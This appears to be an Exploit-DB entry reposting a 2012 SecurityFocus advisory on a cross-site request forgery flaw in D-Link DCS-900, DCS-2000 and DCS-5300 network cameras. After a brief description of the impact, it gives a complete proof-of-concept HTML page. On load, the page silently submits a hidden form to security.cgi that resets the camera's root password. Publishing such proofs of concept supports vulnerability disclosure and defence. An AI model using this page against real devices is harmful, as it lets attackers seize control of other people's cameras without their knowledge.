D-Link DCS - 'security.cgi' Cross-Site Request Forgery

EDB-ID:

36877




Platform:

Hardware

Date:

2012-02-23


source: https://www.securityfocus.com/bid/52134/info

The D-Link DCS-900, DCS-2000, and DCS-5300 are prone to a cross-site request-forgery vulnerability.

Successful exploits may allow attackers to run privileged commands on the affected device, change configuration, cause denial-of-service conditions, or inject arbitrary script code. Other attacks are also possible.

This issue affects D-Link DCS-900, DCS-2000, and DCS-5300. 

<html>
<body onload="javascript:document.forms[0].submit()">
<form method="POST" name="form0" action="http://www.example.com/setup/security.cgi">
<input type="hidden" name="rootpass" value="your_pass"/>
<input type="hidden" name="confirm" value="your_pass"/>
</form>
</body>
</html>